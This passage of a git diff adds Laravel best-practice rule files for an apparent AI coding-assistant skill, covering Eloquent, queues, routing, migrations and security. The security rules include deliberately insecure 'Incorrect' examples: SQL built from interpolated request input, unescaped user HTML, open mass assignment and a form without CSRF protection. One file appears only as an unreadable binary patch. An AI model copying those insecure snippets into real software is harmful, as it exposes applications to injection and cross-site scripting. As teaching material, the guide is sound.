+        'is_active' => 'boolean',
+        'metadata' => 'array',
+        'total' => 'decimal:2',
+    ];
+}
+```
+
+## Cast Date Columns Properly
+
+Always cast date columns. Use Carbon instances in templates instead of formatting strings manually.
+
+Incorrect:
+```blade
+{{ Carbon::createFromFormat('Y-d-m H-i', $order->ordered_at)->toDateString() }}
+```
+
+Correct:
+```php
+protected function casts(): array
+{
+    return [
+        'ordered_at' => 'datetime',
+    ];
+}
+```
+
+```blade
+{{ $order->ordered_at->toDateString() }}
+{{ $order->ordered_at->format('m-d') }}
+```
+
+## Use `whereBelongsTo()` for Relationship Queries
+
+Cleaner than manually specifying foreign keys.
+
+Incorrect:
+```php
+Post::where('user_id', $user->id)->get();
+```
+
+Correct:
+```php
+Post::whereBelongsTo($user)->get();
+Post::whereBelongsTo($user, 'author')->get();
+```
+
+## Avoid Hardcoded Table Names in Queries
+
+Never use string literals for table names in raw queries, joins, or subqueries. Hardcoded table names make it impossible to find all places a model is used and break refactoring (e.g., renaming a table requires hunting through every raw string).
+
+Incorrect:
+```php
+DB::table('users')->where('active', true)->get();
+
+$query->join('companies', 'companies.id', '=', 'users.company_id');
+
+DB::select('SELECT * FROM orders WHERE status = ?', ['pending']);
+```
+
+Correct — reference the model's table:
+```php
+DB::table((new User)->getTable())->where('active', true)->get();
+
+// Even better — use Eloquent or the query builder instead of raw SQL
+User::where('active', true)->get();
+Order::where('status', 'pending')->get();
+```
+
+Prefer Eloquent queries and relationships over `DB::table()` whenever possible — they already reference the model's table. When `DB::table()` or raw joins are unavoidable, always use `(new Model)->getTable()` to keep the reference traceable.
+
+**Exception — migrations:** In migrations, hardcoded table names via `DB::table('settings')` are acceptable and preferred. Models change over time but migrations are frozen snapshots — referencing a model that is later renamed or deleted would break the migration.
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/error-handling.md b/.claude/skills/laravel-best-practices/rules/error-handling.md
new file mode 100644
index 000000000..bb8e7a387
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/error-handling.md
@@ -0,0 +1,72 @@
+# Error Handling Best Practices
+
+## Exception Reporting and Rendering
+
+There are two valid approaches — choose one and apply it consistently across the project.
+
+**Co-location on the exception class** — keeps behavior alongside the exception definition, easier to find:
+
+```php
+class InvalidOrderException extends Exception
+{
+    public function report(): void { /* custom reporting */ }
+
+    public function render(Request $request): Response
+    {
+        return response()->view('errors.invalid-order', status: 422);
+    }
+}
+```
+
+**Centralized in `bootstrap/app.php`** — all exception handling in one place, easier to see the full picture:
+
+```php
+->withExceptions(function (Exceptions $exceptions) {
+    $exceptions->report(function (InvalidOrderException $e) { /* ... */ });
+    $exceptions->render(function (InvalidOrderException $e, Request $request) {
+        return response()->view('errors.invalid-order', status: 422);
+    });
+})
+```
+
+Check the existing codebase and follow whichever pattern is already established.
+
+## Use `ShouldntReport` for Exceptions That Should Never Log
+
+More discoverable than listing classes in `dontReport()`.
+
+```php
+class PodcastProcessingException extends Exception implements ShouldntReport {}
+```
+
+## Throttle High-Volume Exceptions
+
+A single failing integration can flood error tracking. Use `throttle()` to rate-limit per exception type.
+
+## Enable `dontReportDuplicates()`
+
+Prevents the same exception instance from being logged multiple times when `report($e)` is called in multiple catch blocks.
+
+## Force JSON Error Rendering for API Routes
+
+Laravel auto-detects `Accept: application/json` but API clients may not set it. Explicitly declare JSON rendering for API routes.
+
+```php
+$exceptions->shouldRenderJsonWhen(function (Request $request, Throwable $e) {
+    return $request->is('api/*') || $request->expectsJson();
+});
+```
+
+## Add Context to Exception Classes
+
+Attach structured data to exceptions at the source via a `context()` method — Laravel includes it automatically in the log entry.
+
+```php
+class InvalidOrderException extends Exception
+{
+    public function context(): array
+    {
+        return ['order_id' => $this->orderId];
+    }
+}
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/events-notifications.md b/.claude/skills/laravel-best-practices/rules/events-notifications.md
new file mode 100644
index 000000000..bc43f1997
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/events-notifications.md
@@ -0,0 +1,48 @@
+# Events & Notifications Best Practices
+
+## Rely on Event Discovery
+
+Laravel auto-discovers listeners by reading `handle(EventType $event)` type-hints. No manual registration needed in `AppServiceProvider`.
+
+## Run `event:cache` in Production Deploy
+
+Event discovery scans the filesystem per-request in dev. Cache it in production: `php artisan optimize` or `php artisan event:cache`.
+
+## Use `ShouldDispatchAfterCommit` Inside Transactions
+
+Without it, a queued listener may process before the DB transaction commits, reading data that doesn't exist yet.
+
+```php
+class OrderShipped implements ShouldDispatchAfterCommit {}
+```
+
+## Always Queue Notifications
+
+Notifications often hit external APIs (email, SMS, Slack). Without `ShouldQueue`, they block the HTTP response.
+
+```php
+class InvoicePaid extends Notification implements ShouldQueue
+{
+    use Queueable;
+}
+```
+
+## Use `afterCommit()` on Notifications in Transactions
+
+Same race condition as events — the queued notification job may run before the transaction commits.
+
+## Route Notification Channels to Dedicated Queues
+
+Mail and database notifications have different priorities. Use `viaQueues()` to route them to separate queues.
+
+## Use On-Demand Notifications for Non-User Recipients
+
+Avoid creating dummy models to send notifications to arbitrary addresses.
+
+```php
+Notification::route('mail', 'admin@example.com')->notify(new SystemAlert());
+```
+
+## Implement `HasLocalePreference` on Notifiable Models
+
+Laravel automatically uses the user's preferred locale for all notifications and mailables — no per-call `locale()` needed.
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/http-client.md b/.claude/skills/laravel-best-practices/rules/http-client.md
new file mode 100644
index 000000000..0a7876ed3
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/http-client.md
@@ -0,0 +1,160 @@
+# HTTP Client Best Practices
+
+## Always Set Explicit Timeouts
+
+The default timeout is 30 seconds — too long for most API calls. Always set explicit `timeout` and `connectTimeout` to fail fast.
+
+Incorrect:
+```php
+$response = Http::get('https://api.example.com/users');
+```
+
+Correct:
+```php
+$response = Http::timeout(5)
+    ->connectTimeout(3)
+    ->get('https://api.example.com/users');
+```
+
+For service-specific clients, define timeouts in a macro:
+
+```php
+Http::macro('github', function () {
+    return Http::baseUrl('https://api.github.com')
+        ->timeout(10)
+        ->connectTimeout(3)
+        ->withToken(config('services.github.token'));
+});
+
+$response = Http::github()->get('/repos/laravel/framework');
+```
+
+## Use Retry with Backoff for External APIs
+
+External APIs have transient failures. Use `retry()` with increasing delays.
+
+Incorrect:
+```php
+$response = Http::post('https://api.stripe.com/v1/charges', $data);
+
+if ($response->failed()) {
+    throw new PaymentFailedException('Charge failed');
+}
+```
+
+Correct:
+```php
+$response = Http::retry([100, 500, 1000])
+    ->timeout(10)
+    ->post('https://api.stripe.com/v1/charges', $data);
+```
+
+Only retry on specific errors:
+
+```php
+$response = Http::retry(3, 100, function (Exception $exception, PendingRequest $request) {
+    return $exception instanceof ConnectionException
+        || ($exception instanceof RequestException && $exception->response->serverError());
+})->post('https://api.example.com/data');
+```
+
+## Handle Errors Explicitly
+
+The HTTP Client does not throw on 4xx/5xx by default. Always check status or use `throw()`.
+
+Incorrect:
+```php
+$response = Http::get('https://api.example.com/users/1');
+$user = $response->json(); // Could be an error body
+```
+
+Correct:
+```php
+$response = Http::timeout(5)
+    ->get('https://api.example.com/users/1')
+    ->throw();
+
+$user = $response->json();
+```
+
+For graceful degradation:
+
+```php
+$response = Http::get('https://api.example.com/users/1');
+
+if ($response->successful()) {
+    return $response->json();
+}
+
+if ($response->notFound()) {
+    return null;
+}
+
+$response->throw();
+```
+
+## Use Request Pooling for Concurrent Requests
+
+When making multiple independent API calls, use `Http::pool()` instead of sequential calls.
+
+Incorrect:
+```php
+$users = Http::get('https://api.example.com/users')->json();
+$posts = Http::get('https://api.example.com/posts')->json();
+$comments = Http::get('https://api.example.com/comments')->json();
+```
+
+Correct:
+```php
+use Illuminate\Http\Client\Pool;
+
+$responses = Http::pool(fn (Pool $pool) => [
+    $pool->as('users')->get('https://api.example.com/users'),
+    $pool->as('posts')->get('https://api.example.com/posts'),
+    $pool->as('comments')->get('https://api.example.com/comments'),
+]);
+
+$users = $responses['users']->json();
+$posts = $responses['posts']->json();
+```
+
+## Fake HTTP Calls in Tests
+
+Never make real HTTP requests in tests. Use `Http::fake()` and `preventStrayRequests()`.
+
+Incorrect:
+```php
+it('syncs user from API', function () {
+    $service = new UserSyncService;
+    $service->sync(1); // Hits the real API
+});
+```
+
+Correct:
+```php
+it('syncs user from API', function () {
+    Http::preventStrayRequests();
+
+    Http::fake([
+        'api.example.com/users/1' => Http::response([
+            'name' => 'John Doe',
+            'email' => 'john@example.com',
+        ]),
+    ]);
+
+    $service = new UserSyncService;
+    $service->sync(1);
+
+    Http::assertSent(function (Request $request) {
+        return $request->url() === 'https://api.example.com/users/1';
+    });
+});
+```
+
+Test failure scenarios too:
+
+```php
+Http::fake([
+    'api.example.com/*' => Http::failedConnection(),
+]);
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/mail.md b/.claude/skills/laravel-best-practices/rules/mail.md
new file mode 100644
index 000000000..c7f67966e
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/mail.md
@@ -0,0 +1,27 @@
+# Mail Best Practices
+
+## Implement `ShouldQueue` on the Mailable Class
+
+Makes queueing the default regardless of how the mailable is dispatched. No need to remember `Mail::queue()` at every call site — `Mail::send()` also queues it.
+
+## Use `afterCommit()` on Mailables Inside Transactions
+
+A queued mailable dispatched inside a transaction may process before the commit. Use `$this->afterCommit()` in the constructor.
+
+## Use `assertQueued()` Not `assertSent()` for Queued Mailables
+
+`Mail::assertSent()` only catches synchronous mail. Queued mailables silently pass `assertSent`, giving false confidence.
+
+Incorrect: `Mail::assertSent(OrderShipped::class);` when mailable implements `ShouldQueue`.
+
+Correct: `Mail::assertQueued(OrderShipped::class);`
+
+## Use Markdown Mailables for Transactional Emails
+
+Markdown mailables auto-generate both HTML and plain-text versions, use responsive components, and allow global style customization. Generate with `--markdown` flag.
+
+## Separate Content Tests from Sending Tests
+
+Content tests: instantiate the mailable directly, call `assertSeeInHtml()`.
+Sending tests: use `Mail::fake()` and `assertSent()`/`assertQueued()`.
+Don't mix them — it conflates concerns and makes tests brittle.
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/migrations.md b/.claude/skills/laravel-best-practices/rules/migrations.md
new file mode 100644
index 000000000..de25aa39c
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/migrations.md
@@ -0,0 +1,121 @@
+# Migration Best Practices
+
+## Generate Migrations with Artisan
+
+Always use `php artisan make:migration` for consistent naming and timestamps.
+
+Incorrect (manually created file):
+```php
+// database/migrations/posts_migration.php  ← wrong naming, no timestamp
+```
+
+Correct (Artisan-generated):
+```bash
+php artisan make:migration create_posts_table
+php artisan make:migration add_slug_to_posts_table
+```
+
+## Use `constrained()` for Foreign Keys
+
+Automatic naming and referential integrity.
+
+```php
+$table->foreignId('user_id')->constrained()->cascadeOnDelete();
+
+// Non-standard names
+$table->foreignId('author_id')->constrained('users');
+```
+
+## Never Modify Deployed Migrations
+
+Once a migration has run in production, treat it as immutable. Create a new migration to change the table.
+
+Incorrect (editing a deployed migration):
+```php
+// 2024_01_01_create_posts_table.php — already in production
+$table->string('slug')->unique(); // ← added after deployment
+```
+
+Correct (new migration to alter):
+```php
+// 2024_03_15_add_slug_to_posts_table.php
+Schema::table('posts', function (Blueprint $table) {
+    $table->string('slug')->unique()->after('title');
+});
+```
+
+## Add Indexes in the Migration
+
+Add indexes when creating the table, not as an afterthought. Columns used in `WHERE`, `ORDER BY`, and `JOIN` clauses need indexes.
+
+Incorrect:
+```php
+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->constrained();
+    $table->string('status');
+    $table->timestamps();
+});
+```
+
+Correct:
+```php
+Schema::create('orders', function (Blueprint $table) {
+    $table->id();
+    $table->foreignId('user_id')->constrained()->index();
+    $table->string('status')->index();
+    $table->timestamp('shipped_at')->nullable()->index();
+    $table->timestamps();
+});
+```
+
+## Mirror Defaults in Model `$attributes`
+
+When a column has a database default, mirror it in the model so new instances have correct values before saving.
+
+```php
+// Migration
+$table->string('status')->default('pending');
+
+// Model
+protected $attributes = [
+    'status' => 'pending',
+];
+```
+
+## Write Reversible `down()` Methods by Default
+
+Implement `down()` for schema changes that can be safely reversed so `migrate:rollback` works in CI and failed deployments.
+
+```php
+public function down(): void
+{
+    Schema::table('posts', function (Blueprint $table) {
+        $table->dropColumn('slug');
+    });
+}
+```
+
+For intentionally irreversible migrations (e.g., destructive data backfills), leave a clear comment and require a forward fix migration instead of pretending rollback is supported.
+
+## Keep Migrations Focused
+
+One concern per migration. Never mix DDL (schema changes) and DML (data manipulation).
+
+Incorrect (partial failure creates unrecoverable state):
+```php
+public function up(): void
+{
+    Schema::create('settings', function (Blueprint $table) { ... });
+    DB::table('settings')->insert(['key' => 'version', 'value' => '1.0']);
+}
+```
+
+Correct (separate migrations):
+```php
+// Migration 1: create_settings_table
+Schema::create('settings', function (Blueprint $table) { ... });
+
+// Migration 2: seed_default_settings
+DB::table('settings')->insert(['key' => 'version', 'value' => '1.0']);
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/queue-jobs.md b/.claude/skills/laravel-best-practices/rules/queue-jobs.md
new file mode 100644
index 000000000..d4575aac0
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/queue-jobs.md
@@ -0,0 +1,146 @@
+# Queue & Job Best Practices
+
+## Set `retry_after` Greater Than `timeout`
+
+If `retry_after` is shorter than the job's `timeout`, the queue worker re-dispatches the job while it's still running, causing duplicate execution.
+
+Incorrect (`retry_after` ≤ `timeout`):
+```php
+class ProcessReport implements ShouldQueue
+{
+    public $timeout = 120;
+}
+
+// config/queue.php — retry_after: 90 ← job retried while still running!
+```
+
+Correct (`retry_after` > `timeout`):
+```php
+class ProcessReport implements ShouldQueue
+{
+    public $timeout = 120;
+}
+
+// config/queue.php — retry_after: 180 ← safely longer than any job timeout
+```
+
+## Use Exponential Backoff
+
+Use progressively longer delays between retries to avoid hammering failing services.
+
+Incorrect (fixed retry interval):
+```php
+class SyncWithStripe implements ShouldQueue
+{
+    public $tries = 3;
+    // Default: retries immediately, overwhelming the API
+}
+```
+
+Correct (exponential backoff):
+```php
+class SyncWithStripe implements ShouldQueue
+{
+    public $tries = 3;
+    public $backoff = [1, 5, 10];
+}
+```
+
+## Implement `ShouldBeUnique`
+
+Prevent duplicate job processing.
+
+```php
+class GenerateInvoice implements ShouldQueue, ShouldBeUnique
+{
+    public function uniqueId(): string
+    {
+        return $this->order->id;
+    }
+
+    public $uniqueFor = 3600;
+}
+```
+
+## Always Implement `failed()`
+
+Handle errors explicitly — don't rely on silent failure.
+
+```php
+public function failed(?Throwable $exception): void
+{
+    $this->podcast->update(['status' => 'failed']);
+    Log::error('Processing failed', ['id' => $this->podcast->id, 'error' => $exception->getMessage()]);
+}
+```
+
+## Rate Limit External API Calls in Jobs
+
+Use `RateLimited` middleware to throttle jobs calling third-party APIs.
+
+```php
+public function middleware(): array
+{
+    return [new RateLimited('external-api')];
+}
+```
+
+## Batch Related Jobs
+
+Use `Bus::batch()` when jobs should succeed or fail together.
+
+```php
+Bus::batch([
+    new ImportCsvChunk($chunk1),
+    new ImportCsvChunk($chunk2),
+])
+->then(fn (Batch $batch) => Notification::send($user, new ImportComplete))
+->catch(fn (Batch $batch, Throwable $e) => Log::error('Batch failed'))
+->dispatch();
+```
+
+## `retryUntil()` Needs `$tries = 0`
+
+When using time-based retry limits, set `$tries = 0` to avoid premature failure.
+
+```php
+public $tries = 0;
+
+public function retryUntil(): DateTime
+{
+    return now()->addHours(4);
+}
+```
+
+## Use `WithoutOverlapping::untilProcessing()`
+
+Prevents concurrent execution while allowing new instances to queue.
+
+```php
+public function middleware(): array
+{
+    return [new WithoutOverlapping($this->product->id)->untilProcessing()];
+}
+```
+
+Without `untilProcessing()`, the lock extends through queue wait time. With it, the lock releases when processing starts.
+
+## Use Horizon for Complex Queue Scenarios
+
+Use Laravel Horizon when you need monitoring, auto-scaling, failure tracking, or multiple queues with different priorities.
+
+```php
+// config/horizon.php
+'environments' => [
+    'production' => [
+        'supervisor-1' => [
+            'connection' => 'redis',
+            'queue' => ['high', 'default', 'low'],
+            'balance' => 'auto',
+            'minProcesses' => 1,
+            'maxProcesses' => 10,
+            'tries' => 3,
+        ],
+    ],
+],
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/routing.md b/.claude/skills/laravel-best-practices/rules/routing.md
new file mode 100644
index 000000000..e288375d7
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/routing.md
@@ -0,0 +1,98 @@
+# Routing & Controllers Best Practices
+
+## Use Implicit Route Model Binding
+
+Let Laravel resolve models automatically from route parameters.
+
+Incorrect:
+```php
+public function show(int $id)
+{
+    $post = Post::findOrFail($id);
+}
+```
+
+Correct:
+```php
+public function show(Post $post)
+{
+    return view('posts.show', ['post' => $post]);
+}
+```
+
+## Use Scoped Bindings for Nested Resources
+
+Enforce parent-child relationships automatically.
+
+```php
+Route::get('/users/{user}/posts/{post}', function (User $user, Post $post) {
+    // $post is automatically scoped to $user
+})->scopeBindings();
+```
+
+## Use Resource Controllers
+
+Use `Route::resource()` or `apiResource()` for RESTful endpoints.
+
+```php
+Route::resource('posts', PostController::class);
+Route::apiResource('api/posts', Api\PostController::class);
+```
+
+## Keep Controllers Thin
+
+Aim for under 10 lines per method. Extract business logic to action or service classes.
+
+Incorrect:
+```php
+public function store(Request $request)
+{
+    $validated = $request->validate([...]);
+    if ($request->hasFile('image')) {
+        $request->file('image')->move(public_path('images'));
+    }
+    $post = Post::create($validated);
+    $post->tags()->sync($validated['tags']);
+    event(new PostCreated($post));
+    return redirect()->route('posts.show', $post);
+}
+```
+
+Correct:
+```php
+public function store(StorePostRequest $request, CreatePostAction $create)
+{
+    $post = $create->execute($request->validated());
+
+    return redirect()->route('posts.show', $post);
+}
+```
+
+## Type-Hint Form Requests
+
+Type-hinting Form Requests triggers automatic validation and authorization before the method executes.
+
+Incorrect:
+```php
+public function store(Request $request): RedirectResponse
+{
+    $validated = $request->validate([
+        'title' => ['required', 'max:255'],
+        'body' => ['required'],
+    ]);
+
+    Post::create($validated);
+
+    return redirect()->route('posts.index');
+}
+```
+
+Correct:
+```php
+public function store(StorePostRequest $request): RedirectResponse
+{
+    Post::create($request->validated());
+
+    return redirect()->route('posts.index');
+}
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/scheduling.md b/.claude/skills/laravel-best-practices/rules/scheduling.md
new file mode 100644
index 000000000..dfaefa26f
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/scheduling.md
@@ -0,0 +1,39 @@
+# Task Scheduling Best Practices
+
+## Use `withoutOverlapping()` on Variable-Duration Tasks
+
+Without it, a long-running task spawns a second instance on the next tick, causing double-processing or resource exhaustion.
+
+## Use `onOneServer()` on Multi-Server Deployments
+
+Without it, every server runs the same task simultaneously. Requires a shared cache driver (Redis, database, Memcached).
+
+## Use `runInBackground()` for Concurrent Long Tasks
+
+By default, tasks at the same tick run sequentially. A slow first task delays all subsequent ones. `runInBackground()` runs them as separate processes.
+
+## Use `environments()` to Restrict Tasks
+
+Prevent accidental execution of production-only tasks (billing, reporting) on staging.
+
+```php
+Schedule::command('billing:charge')->monthly()->environments(['production']);
+```
+
+## Use `takeUntilTimeout()` for Time-Bounded Processing
+
+A task running every 15 minutes that processes an unbounded cursor can overlap with the next run. Bound execution time.
+
+## Use Schedule Groups for Shared Configuration
+
+Avoid repeating `->onOneServer()->timezone('America/New_York')` across many tasks.
+
+```php
+Schedule::daily()
+    ->onOneServer()
+    ->timezone('America/New_York')
+    ->group(function () {
+        Schedule::command('emails:send --force');
+        Schedule::command('emails:prune');
+    });
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/security.md b/.claude/skills/laravel-best-practices/rules/security.md
new file mode 100644
index 000000000..524d47e61
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/security.md
@@ -0,0 +1,198 @@
+# Security Best Practices
+
+## Mass Assignment Protection
+
+Every model must define `$fillable` (whitelist) or `$guarded` (blacklist).
+
+Incorrect:
+```php
+class User extends Model
+{
+    protected $guarded = []; // All fields are mass assignable
+}
+```
+
+Correct:
+```php
+class User extends Model
+{
+    protected $fillable = [
+        'name',
+        'email',
+        'password',
+    ];
+}
+```
+
+Never use `$guarded = []` on models that accept user input.
+
+## Authorize Every Action
+
+Use policies or gates in controllers. Never skip authorization.
+
+Incorrect:
+```php
+public function update(Request $request, Post $post)
+{
+    $post->update($request->validated());
+}
+```
+
+Correct:
+```php
+public function update(UpdatePostRequest $request, Post $post)
+{
+    Gate::authorize('update', $post);
+
+    $post->update($request->validated());
+}
+```
+
+Or via Form Request:
+
+```php
+public function authorize(): bool
+{
+    return $this->user()->can('update', $this->route('post'));
+}
+```
+
+## Prevent SQL Injection
+
+Always use parameter binding. Never interpolate user input into queries.
+
+Incorrect:
+```php
+DB::select("SELECT * FROM users WHERE name = '{$request->name}'");
+```
+
+Correct:
+```php
+User::where('name', $request->name)->get();
+
+// Raw expressions with bindings
+User::whereRaw('LOWER(name) = ?', [strtolower($request->name)])->get();
+```
+
+## Escape Output to Prevent XSS
+
+Use `{{ }}` for HTML escaping. Only use `{!! !!}` for trusted, pre-sanitized content.
+
+Incorrect:
+```blade
+{!! $user->bio !!}
+```
+
+Correct:
+```blade
+{{ $user->bio }}
+```
+
+## CSRF Protection
+
+Include `@csrf` in all POST/PUT/DELETE Blade forms. Not needed in Inertia.
+
+Incorrect:
+```blade
+<form method="POST" action="/posts">
+    <input type="text" name="title">
+</form>
+```
+
+Correct:
+```blade
+<form method="POST" action="/posts">
+    @csrf
+    <input type="text" name="title">
+</form>
+```
+
+## Rate Limit Auth and API Routes
+
+Apply `throttle` middleware to authentication and API routes.
+
+```php
+RateLimiter::for('login', function (Request $request) {
+    return Limit::perMinute(5)->by($request->ip());
+});
+
+Route::post('/login', LoginController::class)->middleware('throttle:login');
+```
+
+## Validate File Uploads
+
+Validate MIME type, extension, and size. Never trust client-provided filenames.
+
+```php
+public function rules(): array
+{
+    return [
+        'avatar' => ['required', 'image', 'mimes:jpg,jpeg,png,webp', 'max:2048'],
+    ];
+}
+```
+
+Store with generated filenames:
+
+```php
+$path = $request->file('avatar')->store('avatars', 'public');
+```
+
+## Keep Secrets Out of Code
+
+Never commit `.env`. Access secrets via `config()` only.
+
+Incorrect:
+```php
+$key = env('API_KEY');
+```
+
+Correct:
+```php
+// config/services.php
+'api_key' => env('API_KEY'),
+
+// In application code
+$key = config('services.api_key');
+```
+
+## Audit Dependencies
+
+Run `composer audit` periodically to check for known vulnerabilities in dependencies. Automate this in CI to catch issues before deployment.
+
+```bash
+composer audit
+```
+
+## Encrypt Sensitive Database Fields
+
+Use `encrypted` cast for API keys/tokens and mark the attribute as `hidden`.
+
+Incorrect:
+```php
+class Integration extends Model
+{
+    protected function casts(): array
+    {
+        return [
+            'api_key' => 'string',
+        ];
+    }
+}
+```
+
+Correct:
+```php
+class Integration extends Model
+{
+    protected $hidden = ['api_key', 'api_secret'];
+
+    protected function casts(): array
+    {
+        return [
+            'api_key' => 'encrypted',
+            'api_secret' => 'encrypted',
+        ];
+    }
+}
+```
\ No newline at end of file
diff --git a/.claude/skills/laravel-best-practices/rules/style.md b/.claude/skills/laravel-best-practices/rules/style.md
new file mode 100644
index 0000000000000000000000000000000000000000..db689bf774d1763ac3ec520a3874015f5421ff5b
GIT binary patch
literal 4443
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
F{|%Ge#T5Vm

literal 0
HcmV?d00001

diff --git a/.claude/skills/laravel-best-practices/rules/testing.md b/.claude/skills/laravel-best-practices/rules/testing.md
new file mode 100644
index 000000000..d39cc3ed0
--- /dev/null
+++ b/.claude/skills/laravel-best-practices/rules/testing.md
@@ -0,0 +1,43 @@
+# Testing Best Practices
+
+## Use `LazilyRefreshDatabase` Over `RefreshDatabase`
+
+`RefreshDatabase` runs all migrations every test run even when the schema hasn't changed. `LazilyRefreshDatabase` only migrates when needed, significantly speeding up large suites.
+
+## Use Model Assertions Over Raw Database Assertions
+
+Incorrect: `$this->assertDatabaseHas('users', ['id' => $user->id]);`
+
+Correct: `$this->assertModelExists($user);`
+
+More expressive, type-safe, and fails with clearer messages.
+
+## Use Factory States and Sequences
+
+Named states make tests self-documenting. Sequences eliminate repetitive setup.
+
+Incorrect: `User::factory()->create(['email_verified_at' => null]);`
+
+Correct: `User::factory()->unverified()->create();`
+
+## Use `Exceptions::fake()` to Assert Exception Reporting
+
